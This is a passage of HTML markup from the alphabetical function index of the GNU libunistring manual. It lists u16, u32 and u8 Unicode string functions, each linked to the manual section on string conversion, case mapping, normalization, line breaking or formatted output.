<tr><td></td><td valign="top"><a href="libunistring_6.html#IDX215"><code>u16_u16_vsprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX42"><code>u16_uctomb</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX210"><code>u16_vasnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX209"><code>u16_vasprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX208"><code>u16_vsnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX207"><code>u16_vsprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX707"><code>u16_width</code></a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX764"><code>u16_width_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_11.html#IDX737"><code>u16_wordbreaks</code></a></td><td valign="top"><a href="libunistring_11.html#SEC45">11.1 Word breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX222"><code>u32_asnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX221"><code>u32_asprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX862"><code>u32_casecmp</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX874"><code>u32_casecoll</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX856"><code>u32_casefold</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX870"><code>u32_casexfrm</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX833"><code>u32_casing_prefix_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX836"><code>u32_casing_prefixes_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX841"><code>u32_casing_suffix_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX844"><code>u32_casing_suffixes_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX22"><code>u32_check</code></a></td><td valign="top"><a href="libunistring_4.html#SEC12">4.1 Elementary string checks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX64"><code>u32_chr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX57"><code>u32_cmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX60"><code>u32_cmp2</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX163"><code>u32_conv_from_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX166"><code>u32_conv_to_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX47"><code>u32_cpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX71"><code>u32_cpy_alloc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC15">4.4 Elementary string functions with memory allocation</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX859"><code>u32_ct_casefold</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX850"><code>u32_ct_tolower</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX853"><code>u32_ct_totitle</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX847"><code>u32_ct_toupper</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX150"><code>u32_endswith</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX720"><code>u32_grapheme_breaks</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX714"><code>u32_grapheme_next</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX717"><code>u32_grapheme_prev</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX890"><code>u32_is_cased</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX887"><code>u32_is_casefolded</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX881"><code>u32_is_lowercase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX884"><code>u32_is_titlecase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX878"><code>u32_is_uppercase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX31"><code>u32_mblen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX68"><code>u32_mbsnlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX37"><code>u32_mbtouc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX34"><code>u32_mbtouc_unsafe</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX40"><code>u32_mbtoucr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX50"><code>u32_move</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX81"><code>u32_next</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX798"><code>u32_normalize</code></a></td><td valign="top"><a href="libunistring_13.html#SEC51">13.3 Normalization of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX801"><code>u32_normcmp</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX809"><code>u32_normcoll</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX806"><code>u32_normxfrm</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX761"><code>u32_possible_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX84"><code>u32_prev</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX53"><code>u32_set</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX220"><code>u32_snprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX219"><code>u32_sprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX147"><code>u32_startswith</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX97"><code>u32_stpcpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX103"><code>u32_stpncpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX106"><code>u32_strcat</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX128"><code>u32_strchr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX113"><code>u32_strcmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX117"><code>u32_strcoll</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX169"><code>u32_strconv_from_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX175"><code>u32_strconv_from_locale</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX172"><code>u32_strconv_to_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX178"><code>u32_strconv_to_locale</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX94"><code>u32_strcpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX134"><code>u32_strcspn</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX124"><code>u32_strdup</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX87"><code>u32_strlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX74"><code>u32_strmblen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX78"><code>u32_strmbtouc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX109"><code>u32_strncat</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX120"><code>u32_strncmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX100"><code>u32_strncpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX90"><code>u32_strnlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX140"><code>u32_strpbrk</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX131"><code>u32_strrchr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX137"><code>u32_strspn</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX144"><code>u32_strstr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX153"><code>u32_strtok</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX711"><code>u32_strwidth</code></a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX28"><code>u32_to_u16</code></a></td><td valign="top"><a href="libunistring_4.html#SEC13">4.2 Elementary string conversions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX27"><code>u32_to_u8</code></a></td><td valign="top"><a href="libunistring_4.html#SEC13">4.2 Elementary string conversions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX825"><code>u32_tolower</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX828"><code>u32_totitle</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX822"><code>u32_toupper</code></a></td><td valign="top"><a href="libunistring_14.html#SEC56">14.2 Case mappings of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX230"><code>u32_u32_asnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX229"><code>u32_u32_asprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX228"><code>u32_u32_snprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX227"><code>u32_u32_sprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX234"><code>u32_u32_vasnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX233"><code>u32_u32_vasprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX232"><code>u32_u32_vsnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX231"><code>u32_u32_vsprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX43"><code>u32_uctomb</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX226"><code>u32_vasnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX225"><code>u32_vasprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX224"><code>u32_vsnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX223"><code>u32_vsprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_9.html#IDX708"><code>u32_width</code></a></td><td valign="top"><a href="libunistring_9.html#SEC40">9. Display width <code>&lt;uniwidth.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX765"><code>u32_width_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_11.html#IDX738"><code>u32_wordbreaks</code></a></td><td valign="top"><a href="libunistring_11.html#SEC45">11.1 Word breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX190"><code>u8_asnprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX189"><code>u8_asprintf</code></a></td><td valign="top"><a href="libunistring_6.html#SEC18">6. Output with Unicode strings <code>&lt;unistdio.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX860"><code>u8_casecmp</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX872"><code>u8_casecoll</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX854"><code>u8_casefold</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX868"><code>u8_casexfrm</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX831"><code>u8_casing_prefix_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX834"><code>u8_casing_prefixes_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX839"><code>u8_casing_suffix_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX842"><code>u8_casing_suffixes_context</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX20"><code>u8_check</code></a></td><td valign="top"><a href="libunistring_4.html#SEC12">4.1 Elementary string checks</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX62"><code>u8_chr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX55"><code>u8_cmp</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX58"><code>u8_cmp2</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX161"><code>u8_conv_from_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_5.html#IDX164"><code>u8_conv_to_encoding</code></a></td><td valign="top"><a href="libunistring_5.html#SEC17">5. Conversions between Unicode and encodings <code>&lt;uniconv.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX45"><code>u8_cpy</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX69"><code>u8_cpy_alloc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC15">4.4 Elementary string functions with memory allocation</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX857"><code>u8_ct_casefold</code></a></td><td valign="top"><a href="libunistring_14.html#SEC58">14.4 Case insensitive comparison</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX848"><code>u8_ct_tolower</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX851"><code>u8_ct_totitle</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX845"><code>u8_ct_toupper</code></a></td><td valign="top"><a href="libunistring_14.html#SEC57">14.3 Case mappings of substrings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX148"><code>u8_endswith</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX718"><code>u8_grapheme_breaks</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX712"><code>u8_grapheme_next</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_10.html#IDX715"><code>u8_grapheme_prev</code></a></td><td valign="top"><a href="libunistring_10.html#SEC42">10.1 Grapheme cluster breaks in a string</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX888"><code>u8_is_cased</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX885"><code>u8_is_casefolded</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX879"><code>u8_is_lowercase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX882"><code>u8_is_titlecase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_14.html#IDX876"><code>u8_is_uppercase</code></a></td><td valign="top"><a href="libunistring_14.html#SEC59">14.5 Case detection</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX29"><code>u8_mblen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX66"><code>u8_mbsnlen</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX35"><code>u8_mbtouc</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX32"><code>u8_mbtouc_unsafe</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX38"><code>u8_mbtoucr</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX48"><code>u8_move</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX79"><code>u8_next</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX796"><code>u8_normalize</code></a></td><td valign="top"><a href="libunistring_13.html#SEC51">13.3 Normalization of strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX799"><code>u8_normcmp</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX807"><code>u8_normcoll</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_13.html#IDX804"><code>u8_normxfrm</code></a></td><td valign="top"><a href="libunistring_13.html#SEC52">13.4 Normalizing comparisons</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_12.html#IDX759"><code>u8_possible_linebreaks</code></a></td><td valign="top"><a href="libunistring_12.html#SEC47">12. Line breaking <code>&lt;unilbrk.h&gt;</code></a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX82"><code>u8_prev</code></a></td><td valign="top"><a href="libunistring_4.html#SEC16">4.5 Elementary string functions on NUL terminated strings</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_4.html#IDX51"><code>u8_set</code></a></td><td valign="top"><a href="libunistring_4.html#SEC14">4.3 Elementary string functions</a></td></tr> <tr><td></td><td valign="top"><a href="libunistring_6.html#IDX188"><code>u8_snprintf</code></a></td><td valign="top"><a 